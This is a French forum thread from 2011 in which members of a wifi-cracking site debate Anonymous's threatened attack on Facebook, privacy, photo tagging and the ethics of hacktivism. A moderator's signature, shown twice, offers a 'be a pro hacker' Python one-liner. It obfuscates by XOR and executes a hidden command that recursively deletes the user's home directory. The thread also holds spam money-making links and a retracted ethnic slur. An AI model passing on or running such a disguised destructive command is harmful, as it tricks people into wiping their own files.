Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-08-2011 18:44:12

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Facebook va t-il être détruit par les Anonymous le 5 novembre 2011 ?

Plop les loulous,

Apparemment les Anonymous veulent en découdre sec et net avec le bébé de Zucky.
Alors le 5 Novembre.

Fin du monde ou pas fin du monde ?

Suis curieux de voir ca, si on se fie à leur communiqué concernant Sony et la suite on peut supposer que cela ne vas rigoler dans le coin smile

Anonymous-150x150.jpg

Facebook va t-il être détruit par les Anonymous le 5 novembre 2011 ?

[Source:] vincentabry.com

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-08-2011 19:06:03

Skeunk
Membre d'Or
Lieu : Chez Baby Fark McGee-zax

Re : Facebook va t-il être détruit par les Anonymous le 5 novembre 2011 ?

Ils ont raison sur beaucoup de points, mais que font ils des gens qui se foutent du fait qu'ils soient fliqués?
Qui se servent de Facebook pour retrouver des personnes perdu de vue comme tu l'avais évoqué?
D'une certaine manière, c'est une forme de dictature : ce qui ne plait pas à anonymous doit disparaitre.
Comme je l'ai dit plus haut, ils ont raison sur beaucoup de points, et je suis d'accord avec eux sur beaucoup. Et je ne prends pas du tout la défence de Facebook, qui de mon point de vue est totalement inutile.

"Nulla è reale, tutto è lecito. Requiescat in pace"

#3 09-08-2011 19:10:45

noireaude
Membre d'honneur
Site Web

Skeunk a écrit :

Ils ont raison sur beaucoup de points, mais que font ils des gens qui se foutent du fait qu'ils soient fliqués?
Qui se servent de Facebook pour retrouver des personnes perdu de vue comme tu l'avais évoqué?
D'une certaine manière, c'est une forme de dictature : ce qui ne plait pas à anonymous doit disparaitre.
Comme je l'ai dit plus haut, ils ont raison sur beaucoup de points, et je suis d'accord avec eux sur beaucoup. Et je ne prends pas du tout la défence de Facebook, qui de mon point de vue est totalement inutile.

Je suis à 200% d'accord avec toi sur ce point et de façon inconditionnelle.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#4 09-08-2011 19:41:24

koala
Membre d'honneur
Lieu : In the sky

Pour ma part je trouve ce qu'il font juste

#5 09-08-2011 19:49:44

Skeunk
Membre d'Or

C'est le problème que l'on retrouve quasiment partout, dans touts les domaines : trouver le juste milieu.
Pour le coup, si ils comptent vraiment exploser Facebook, c'est un peu extrême..

#6 09-08-2011 19:56:52

noireaude
Membre d'honneur
Site Web

koala a écrit :

Pour ma part je trouve ce qu'il font juste

Pas toujours, derrière leur actions, il y a des gens qui n'y sont pour rien.

Tant qu'ils s'attaquent à de grosses organisations gouvernementales, industrielles et plus généralement à des groupes qui ont les moyens de se défendre ok.

Quand ils s'attaque à ceux ci par l'intermédiaire des données d'utilisateurs qui ne sont pas en mesure de se défendre et menacent de les publier, j'assimile cela à du terrorisme aveugle.
Les motivations de certains groupes indépendantistes peuvent paraître parfois noble et justes.
Mais quand ceux-ci tuent des innocents dans des attentats, ça paraît de suite moins noble et les met au rang de terroristes.

Toutes proportions gardées, je trouve qu'ils sont dès fois ils ne sont pas très nobles.

Après comme le soulignes très justement Fuji, Il y a des gens qui savent qu'un service n'est pas bien sous certains aspects mais qui décident de l'utiliser quand même pour une raison ou une autre.

Sur qu'elle base les Anonymous se donnent le droit de décider que ces gens ont tort et se donnent le droit de décider pour eux ?

Tout ce qu'ils font n'est pas mauvais, mais tout n'est pas juste.

#7 09-08-2011 20:20:10

Skeunk
Membre d'Or

Je trouves que dénoncer des choses, à grande échelle, n'a rien de gênant.
Là ou ca deviens plus gênant, c'est quands on commence à imposer ses idées. Desfois c'est utile, pour faire bouger les choses certes.
Mais comme tu le dit :

Tout ce qu'ils font n'est pas mauvais, mais tout n'est pas juste.

Edit : Par contre, je ne vous cache pas le fond de mes pensées, il me tarde vraiment le 5 novembre big_smile

Dernière modification par Skeunk (09-08-2011 20:23:20)

#8 09-08-2011 21:01:28

noireaude
Membre d'honneur
Site Web

Skeunk a écrit :

Edit : Par contre, je ne vous cache pas le fond de mes pensées, il me tarde vraiment le 5 novembre big_smile

J'avoue que je suis curieux aussi.

#9 09-08-2011 21:16:14

M1ck3y
Administrateur
Lieu : Lost in the darkness

Va y avoir un paquet de facebook addicts en pleine crise de manque tongue

#10 09-08-2011 21:21:45

noireaude
Membre d'honneur
Site Web

M1ck3y a écrit :

Va y avoir un paquet de facebook addicts en pleine crise de manque tongue

Voir même des suicides en Corée et au Japon !!!!

Je déconne smile

#11 09-08-2011 21:24:36

Skeunk
Membre d'Or

Quands tu vois qu'ils sont capables de vendre un rhein pour acheter un iPad2, ca ne m'étonnerai pas que tu dise vrai!

#12 09-08-2011 21:27:02

noireaude
Membre d'honneur
Site Web

C'était en Chine wink

#13 09-08-2011 21:28:56

Skeunk
Membre d'Or

Mdr excuse-moi, pour moi ils sont tous bridés lol

Edit : Bon, je retire ce que je viens de dire c'est pas très gentil roll

Dernière modification par Skeunk (09-08-2011 21:36:51)

#14 23-09-2011 19:24:03

spawn
Modérateur

J'attends aussi smile
Mais la lecture de discussions et d'IRC me pousse à penser que facebook ne tombera pas.
Il semble que ce ne soit qu'une partie des Anonymous 'officiels' qui aie fait ce choix.

We'll see.

[hs]moi aussi je suis bridé : 100kBs en download maxi big_smile[/hs]

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#15 23-09-2011 19:49:40

vances1
Membre Indispensable
Site Web

Mais la lecture de discussions et d'IRC me pousse à penser que facebook ne tombera pas.
Il semble que ce ne soit qu'une partie des Anonymous 'officiels' qui aie fait ce choix.

Un seul d'entre eux motivé et compétent pourrais bien y arriver, sans même parler des autres hackers  attiré par leur principe ...

Facebook c'est pas mal, ce qui l'est moin c'est les infos recueilli qu'ils revendent par la suite au plus offrant smile

Pour ce qui est du coté dictature smile, ont le subit chaque jour alors autant tapper fort (c'est mon avis ^^)

J'attend avec impatience de voir comment ils vont s'y prendre !!!

Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

#16 23-09-2011 20:12:10

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Personnellement, j'espère que facebook tombera, juste pour le principe.
je n'ai pas de compte facebook, mais je reçois tout les jours de tout mes contact des demande d'inscription à la limite du harcèlement,  heureusement j'utilise très peu les boite live mail et mes autres boite mail sont épargnée.
Secondo, j'en ai marre que tout les gens que je connais se permettent de poster des photo personnelles sur ce site de m@#!3 sans me demander mon avis au lieux de le laisser dans le répertoire "Images" de leurs pc, ce qui implique que lorsque que je tape mon vrai nom sur google j'arrive a voir ma photo sans jamais avoir écris mon nom sur le net ni posté ma photo.
merci les tag

1310812721.gif

#17 23-09-2011 20:24:46

noireaude
Membre d'honneur
Site Web

coyotus a écrit :

Secondo, j'en ai marre que tout les gens que je connais se permettent de poster des photo personnelles sur ce site de m@#!3 sans me demander mon avis au lieux de le laisser dans le répertoire "Images" de leurs pc, ce qui implique que lorsque que je tape mon vrai nom sur google j'arrive a voir ma photo sans jamais avoir écris mon nom sur le net ni posté ma photo.
merci les tag

C'est ça le plus terrible dans l'histoire et c'est devenu bien pire avec la reconnaissance faciale intégré à Facebook.
Du fichage en bon éduforme.

#18 23-09-2011 20:29:45

koala
Membre d'honneur

Le pire c'est que des centaines de couill*** transformés par la société s'inscrivent dessus chaque jour en pensant que c'est... utile, que ça fait "bien"...

#19 23-09-2011 20:40:47

noireaude
Membre d'honneur
Site Web

koala a écrit :

Le pire c'est que des centaines de couill*** transformés par la société s'inscrivent dessus chaque jour en pensant que c'est... utile, que ça fait "bien"...

Je ne diras pas que c'est des couillons, Facebook ou google+ bien utilisé à des bons côté aussi on est forcé de le reconnaitre si on veut rester objectif.
Il suffit juste de savoir qu'on a très peu de moyens de gérer ce qu'on partage alors il faut faire attention.

Cela dit je suis pas contre l'idée de coller un chataîgne à FB quand même, histoire de smile

#20 23-09-2011 20:43:24

koala
Membre d'honneur

Je ne diras pas que c'est des couillons, Facebook ou google+ bien utilisé à des bons côté aussi on est forcé de le reconnaitre si on veut rester objectif.

pas faux wink

#21 23-09-2011 22:44:05

vances1
Membre Indispensable
Site Web

Pour le plaisir smile

Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

#22 23-09-2011 23:01:27

noireaude
Membre d'honneur
Site Web

Ca fait quand même vachement al quaïda leurs communiqués smile

Il y a juste un truc qui pique l'oeil dans le sous-titrage c'est "tus le", ça fait pas trop sérieux smile

Ps: Selon le forum officiel l'opération est loin d'être confirmée, voir même infirmée .... A suivre....

#23 24-09-2011 00:01:41

vances1
Membre Indispensable
Site Web

Je pense que la traduction n'est pas d'eux ... smile

Je suis totalement fan du style Robin, une derniere pour la route  (j’espère que ça ne polluera pas)

Source wiki:

Anonymous (en français : « Anonyme ») est un groupe de désobéissance civile actif étendu sur Internet, originaire du site 4chan, représentant le concept de plusieurs communautés formées d'internautes agissant de manière anonyme dans un but particulier. Le nom du groupe est considéré comme un mot fourre-tout désignant des membres de certaines sous-cultures d'Internet.
Les actions informatiques et physiques attribuées à Anonymous sont entreprises par des individus non-identifiés. Lors des manifestations physiques du collectif, les membres sont généralement masqués. Ils défendent le droit à la liberté d'expression sur Internet et en dehors.
Bien que ce mème ne soit pas lié à une entité spécifique, plusieurs sites Internet y sont fortement associés, notamment des systèmes de bulletins électroniques tels que 4chan et Futaba, leurs wikis respectifs, Encyclopedia Dramatica, et certains forums. Après une série de manifestations controversées, hautement publiées et d'attaques informatiques par Anonymous en 2008, des incidents liés à ce groupe ont fortement augmenté. En considération de ces capacités, Anonymous à été diffusé par la chaîne télévisée américaine CNN comme étant l'un des trois principaux successeurs de WikiLeaks.

Je crois que même si initialement la "destruction" de Facebook n'avais pas été pensé par les Anonymous, cela vas très certainement produire un effet spécifique au 5 novembre 2011, tir isolé ou autre ...

Dernière modification par vances1 (24-09-2011 01:00:58)

#24 24-09-2011 10:45:34

spawn
Modérateur

mmh. facebook n'est malsain que parce que l'on se retrouve anticonformiste seulement si l'on y est pas.
Je lirais plus de livres, je connaitrais le mot adapté.
[img align=G]http://ifisdead.net/wp-content/uploads/Films/la_vague_die_welle_affiche.jpg[/img]
(Désolé pour le nom français, je n'ai pas pris le temps de la chercher en allemand)

C'est de cette manière que facebook est devenu une dictature.

[houlala, godwin n'est pas loin ^^]

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#25 24-09-2011 21:54:15

M1ck3y
Administrateur
Lieu : Lost in the darkness

coyotus a écrit :

Personnellement, j'espère que facebook tombera, juste pour le principe.
je n'ai pas de compte facebook, mais je reçois tout les jours de tout mes contact des demande d'inscription à la limite du harcèlement,  heureusement j'utilise très peu les boite live mail et mes autres boite mail sont épargnée.
merci les tag

En effet c'est un vrai problème. Je pense que tu as dans ce cas le droit de signaler ces photos et de demander à ce qu'elles soient retirées ainsi que les tags associés en vertu de la loi informatique et libertés qui te garantit un droit d'accès et de rectification aux données te concernant. Le problème c'est que c'est à toi de te prendre la tete à effectuer cette démarche et à perdre ton temps alors qu'à la base tu n'avais jamais demandé à avoir ta photo sur le web. Ils doivent flouter ou retirer les photos si tu en fais la demande, tout comme tu peux demander le floutage de ta maison si elle est sur google streetview. Le souci c'est qu'avec toutes ces "petites" atteintes à la vie privée mises bout à bout on risque tous de se retrouver intégralement fichés aux 4 coins du web sans rien avoir demandé. Et oui, faceboook ça craint.

Annonce